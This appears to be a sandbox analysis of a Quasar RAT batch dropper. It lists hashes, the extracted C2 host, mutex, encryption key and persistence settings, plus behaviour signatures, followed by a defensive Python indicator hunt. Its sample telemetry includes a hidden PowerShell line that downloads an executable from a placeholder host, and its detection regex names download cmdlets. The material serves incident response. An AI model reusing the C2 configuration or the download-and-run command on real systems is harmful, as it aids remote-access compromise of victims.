General

  • Target

    main4.bat

  • Size

    17KB

  • Sample

    241122-dk5qqayrdr

  • MD5

    d2c79d02019fe6507207e4d57360c2d0

  • SHA1

    58c6e205d730b3cdb1186d9c8618c891e6ddbcde

  • SHA256

    900ec958cdc785121d2d7558256066e1189c709291245b4a1ffd4336ae2fc7b4

  • SHA512

    20b38b3b3827c23df5a7c0fdce51524c6f4dc2192b139abef8156f69a25b263f1c5ce502cbd328a056d01396e83a6338e836a55f46a15ce7567313ad82549610

  • SSDEEP

    192:p3U9MgR/KWzBkRIKxZnB2Gl/631wAZ/vhAaiU74/s7HKwSRBPJyU4dWfehLp/rh:C9Mk/p9kRIVHrEsvSRBPJy7Wfezh

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

bot

C2

wooting2000-47095.portmap.host:47095

Mutex

2e05f1ef-743b-4020-b18a-7f4276517e8b

Attributes
  • encryption_key

    E83D6FC31962786DAEA703F111D2381786DF06CA

  • install_name

    Modification1.5.14.12.exe

  • log_directory

    Logs

  • reconnect_delay

    3126

  • startup_key

    explorer.dll

  • subdirectory

    SubDir

Targets

    • Target

      main4.bat

    • Size

      17KB

    • MD5

      d2c79d02019fe6507207e4d57360c2d0

    • SHA1

      58c6e205d730b3cdb1186d9c8618c891e6ddbcde

    • SHA256

      900ec958cdc785121d2d7558256066e1189c709291245b4a1ffd4336ae2fc7b4

    • SHA512

      20b38b3b3827c23df5a7c0fdce51524c6f4dc2192b139abef8156f69a25b263f1c5ce502cbd328a056d01396e83a6338e836a55f46a15ce7567313ad82549610

    • SSDEEP

      192:p3U9MgR/KWzBkRIKxZnB2Gl/631wAZ/vhAaiU74/s7HKwSRBPJyU4dWfehLp/rh:C9Mk/p9kRIVHrEsvSRBPJy7Wfezh

    • Quasar RAT

      Quasar is an open-source .NET remote access tool. The C2 host, mutex, encryption key and install/startup settings listed under Malware Config above are the build-time configuration embedded in this payload.

    • Quasar family

    • Quasar payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest.

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Executes dropped EXE

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory
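The extracted configuration and the behaviour signatures above are only useful to a responder once they are turned into checks. The following is an added example, not part of the sandbox report or of the Quasar project: a Python hunt that matches the report's indicators (file hashes, C2 host and port, mutex, startup key, install name and subdirectory, PowerShell download activity) against constructed host and network telemetry. The JSON event shape and field names, the extra PowerShell download cmdlets beyond Invoke-WebRequest, and the System32 install path used in the sample events are assumptions; the report does not state the install root, so the path check only matches the `SubDir\Modification1.5.14.12.exe` suffix.

```python
"""Hunt the indicators from this Quasar report in host/network telemetry (added example)."""
from __future__ import annotations

import json
import re

# Indicators copied from the report above.
IOC = {
    "sha256": "900ec958cdc785121d2d7558256066e1189c709291245b4a1ffd4336ae2fc7b4",
    "c2_host": "wooting2000-47095.portmap.host",
    "c2_port": 47095,
    "mutex": "2e05f1ef-743b-4020-b18a-7f4276517e8b",
    "startup_key": "explorer.dll",
    "install_name": "Modification1.5.14.12.exe",
    "subdirectory": "SubDir",
}

# The report only shows Invoke-WebRequest; the other names are common download
# equivalents added here as an assumption to broaden the check.
PS_DOWNLOAD = re.compile(
    r"(?:Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadFile|DownloadString)", re.I
)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run$", re.I)

# Constructed sample telemetry (not from the sandbox run), one JSON event per line in an
# assumed EDR-style shape. The System32 install path is an assumption consistent with the
# "Drops file in System32 directory" signature above.
SAMPLE_LOG = r"""
{"type":"file","path":"C:\\Users\\u\\Downloads\\main4.bat","sha256":"900ec958cdc785121d2d7558256066e1189c709291245b4a1ffd4336ae2fc7b4"}
{"type":"process","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c main4.bat"}
{"type":"process","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -NoP -W Hidden -c \"Invoke-WebRequest -Uri http://example.invalid/x -OutFile $env:TEMP\\x.exe\""}
{"type":"dns","host":"wooting2000-47095.portmap.host"}
{"type":"network","host":"wooting2000-47095.portmap.host","dst_port":47095}
{"type":"registry","key":"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","value":"explorer.dll","data":"C:\\Windows\\System32\\SubDir\\Modification1.5.14.12.exe"}
{"type":"mutex","name":"2e05f1ef-743b-4020-b18a-7f4276517e8b"}
{"type":"file","path":"C:\\Windows\\System32\\SubDir\\Modification1.5.14.12.exe","sha256":"0000000000000000000000000000000000000000000000000000000000000000"}
{"type":"process","image":"C:\\Windows\\System32\\SubDir\\Modification1.5.14.12.exe","cmdline":"Modification1.5.14.12.exe"}
{"type":"registry","key":"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","value":"OneDrive","data":"C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"}
{"type":"dns","host":"example.com"}
"""


def load_events(text: str) -> list[dict]:
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def match_event(ev: dict) -> list[str]:
    """Return the names of the report indicators this event hits (empty if none)."""
    hits: list[str] = []
    kind = ev.get("type")
    image = ev.get("image", "").lower()
    if ev.get("sha256", "").lower() == IOC["sha256"]:
        hits.append("sha256")
    if kind == "process":
        if "powershell" in image and PS_DOWNLOAD.search(ev.get("cmdline", "")):
            hits.append("powershell_download")
        if image.endswith("\\" + IOC["install_name"].lower()):
            hits.append("install_name")
    elif kind in ("dns", "network"):
        host = ev.get("host", "").lower()
        # Exact C2 host, or any portmap.host forward on the configured port.
        if host == IOC["c2_host"] or (
            ev.get("dst_port") == IOC["c2_port"] and host.endswith(".portmap.host")
        ):
            hits.append("c2")
    elif kind == "registry":
        if RUN_KEY.search(ev.get("key", "")) and ev.get("value", "").lower() == IOC["startup_key"]:
            hits.append("startup_key")
    elif kind == "mutex" and ev.get("name", "").lower() == IOC["mutex"]:
        hits.append("mutex")
    elif kind == "file":
        suffix = "\\" + IOC["subdirectory"].lower() + "\\" + IOC["install_name"].lower()
        if ev.get("path", "").lower().endswith(suffix):
            hits.append("install_path")
    return hits


def hunt(events: list[dict]) -> dict[str, list[int]]:
    """Map each indicator name to the indexes of the events that hit it."""
    found: dict[str, list[int]] = {}
    for i, ev in enumerate(events):
        for name in match_event(ev):
            found.setdefault(name, []).append(i)
    return found


if __name__ == "__main__":
    for name, idx in hunt(load_events(SAMPLE_LOG)).items():
        print(f"{name}: events {idx}")
```

Run it against real exports by replacing `SAMPLE_LOG` with your own JSON-lines telemetry; a hit on `mutex`, `startup_key` or `c2` on a host that was not the sandbox is worth an immediate triage, while `powershell_download` alone is only a lead and needs the command line reviewed.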

MITRE ATT&CK Enterprise v15